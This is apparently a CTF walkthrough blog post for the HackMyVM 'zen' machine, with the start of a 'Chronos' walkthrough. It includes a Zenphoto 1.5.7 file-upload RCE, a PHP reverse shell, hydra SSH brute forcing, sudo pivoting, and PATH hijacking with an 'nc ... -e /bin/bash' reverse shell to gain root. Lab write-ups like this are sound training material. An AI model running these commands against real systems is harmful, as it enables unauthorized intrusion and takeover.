 |   2048 c3:a0:ac:5d:25:92:47:2c:f5:70:ba:1b:f0:a3:b9:67 (RSA)
 |   256 03:72:ad:7b:df:46:5d:b3:2a:9b:69:a9:c4:11:35:86 (ECDSA)
 |_  256 4b:a1:81:88:73:2a:a0:b6:5c:9f:30:d9:c9:7f:1f:3f (ED25519)
 80/tcp open  http    nginx 1.14.2
 | http-robots.txt: 9 disallowed entries
 | /albums/ /plugins/ /P@ssw0rd /themes/ /zp-core/
 |_/zp-data/ /page/search/ /uploaded/ /backup/
 |_http-server-header: nginx/1.14.2
 |_http-title: Galer\xC3\xADa
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

From main page, get the app name and version number.

```bash
~ curl http://192.168.56.99
<!DOCTYPE html>
...
</body>
</html>
<!-- zenphoto version 1.5.7 -->


Google the zenphoto version 1.5.7, we know it has upload vulnerability.

         Authenticated arbitrary file upload to RCE

Product : Zenphoto
Affected : Zenphoto CMS - <= 1.5.7
Attack Type : Remote

login then go to plugins then go to uploader and press on the check box elFinder
then press apply , after that you go to upload then Files(elFinder) drag and drop
any malicious php code after that go to /uploaded/ and you're php code

Zenphoto through 1.5.7 is affected by authenticated arbitrary file
upload, leading to remote code execution. The attacker must navigate to
the uploader plugin, check the elFinder box, and then drag and drop
files into the Files(elFinder) portion of the UI. This can, for
example, place a .php file in the server's uploaded/ directory.

[Reference]
https://www.linkedin.com/in/abdulaziz-almisfer-22a7861ab/
https://twitter.com/3almisfer
https://github.com/azizalshammari/


From robots.txt, found a strange string: P@ssw0rd.

Find the login panel of zenphoto at /zp-core/admin.php, login with admin:P@ssw0rd.

Upload a php shell and get reverse shell.

```bash
 & kali @ mykali in ~/Documents/zen 0 [13:57:14]
 ~ nc -nlvp 1234        
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:38120.
 Linux zen 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
  20:23:18 up 16 min,  0 users,  load average: 0.00, 0.02, 0.04
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 & kali @ mykali in ~/Documents/zen 0 [14:05:51]
 ~ curl http://192.168.56.99/backup/r.php

Found 3 users in home folder.

www-data@zen:/home$ ls -la
 ls -la
 total 20
 drwxr-xr-x  5 root      root      4096 Jun 14 03:45 .
 drwxr-xr-x 18 root      root      4096 Jun 14 03:19 ..
 drwxr-xr-x  2 hua       hua       4096 Jun 14 03:45 hua
 drwxr-xr-x  2 kodo      kodo      4096 Jun 14 03:24 kodo
 drwxr-xr-x  3 zenmaster zenmaster 4096 Jun 14 03:47 zenmaster

Because we can found no way to escalate to anyone of these 3 users, so we can only bruteforce ssh credentials. 

 ~ hydra -L names.txt -P names.txt -e nsr 192.168.56.99 ssh -t64 -F                                       ...
 [DATA] attacking ssh://192.168.56.99:22/
 [22][ssh] host: 192.168.56.99   login: zenmaster   password: zenmaster

Login as zenmaster, escalate to kodo.

```bash
enmaster@zen:~$ sudo -l
Matching Defaults entries for zenmaster on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zenmaster may run the following commands on zen:
(kodo) NOPASSWD: /bin/bash
zenmaster@zen:~$ sudo -u kodo /bin/bash -p


As user kodo, check sudo -l. Use the edit function, and press !:/bin/bash, escalate to user 

 ```bash
kodo@zen:/home/zenmaster$ sudo -l
 Matching Defaults entries for kodo on zen:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User kodo may run the following commands on zen:
     (hua) NOPASSWD: /usr/bin/see
 kodo@zen:/home/zenmaster$ touch /tmp/tmp.txt
 kodo@zen:/home/zenmaster$ chmod 666 /tmp/tmp.txt
 kodo@zen:/home/zenmaster$ sudo -u hua /usr/bin/see --action=edit /tmp/tmp.txt
 hua@zen:/home/zenmaster$ id
 uid=1002(hua) gid=1002(hua) groups=1002(hua)

Check sudo -l.

```bash
hua@zen:/tmp$ sudo -l
Matching Defaults entries for hua on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hua may run the following commands on zen:
(ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen


 We can write to /use/local/bin.

 ```bash
hua@zen:/tmp$ find / -writable -not -path '/proc*' 2>/dev/null  
 ...
 /tmp/.X11-unix
 /usr/local/bin
 /usr/lib/systemd/system/mountnfs-bootclean.service
 ...

Use strace to track add-shell, it calls awk, cat, rm from /usr/local/bin, which don't exist.

```bash
hua@zen:/tmp$ strace /usr/sbin/add-shell zen 2>&1 |grep /usr/local/bin
stat("/usr/local/bin/awk", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/cat", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/rm", 0x7fff52bfdb80) = -1 ENOENT (No such file or directory)
hua@zen:/tmp$ ls -la /usr/local/bin/awk
ls: cannot access '/usr/local/bin/awk': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/cat
ls: cannot access '/usr/local/bin/cat': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/rm
ls: cannot access '/usr/local/bin/rm': No such file or directory


Then we can write a shell code in awk, and get root shell.

 ```bash
hua@zen:/tmp$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /usr/local/bin/awk
 hua@zen:/tmp$ chmod +x /usr/local/bin/awk
 hua@zen:/tmp$ sudo /usr/sbin/add-shell zen
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 & kali @ mykali in ~ 0 [15:25:33]
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:38124.
 id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 zen

HackMyVm Chronos Walkthrough

发表评论

HackMyVm Chronos Walkthrough

The author's writeup is here:https://al1enum.github.io/docs/Chronos.pdf.

Very interesting machine.

The author use perl to get reverse shell, because the machine blocked many keywords: nc, bash, python, etc.

My way is to use wget to download a php reverse shell.

~ curl 'http://chronos.local:8000/date?format=261Bh6biKcNSb82qsJG3axmPWvBhPVZUTUzqYLXr2nGfYVHfcpNVUhTU1Z95B5dJzYt151Eki' -A 'Chronos'  
 Something went wrong

 ~ curl 'http://chronos.local:8000/date?format=H8SMnBduptVPuh8JQtH81okZXHxz74' -A 'Chronos'
 Sun Aug  8 04:05:06 UTC 2021
 total 24
 drwxr-xr-x 3 www-data www-data 4096 Aug  8 04:03 .
 drwxr-xr-x 3 root     root     4096 Jul 29 08:59 ..
 drwxr-xr-x 2 www-data www-data 4096 Jul 30 08:00 css
 -rw-r--r-- 1 www-data www-data 1887 Aug  4 07:18 index.html
 -rw-r--r-- 1 www-data www-data 5496 Aug  8 04:03 r.php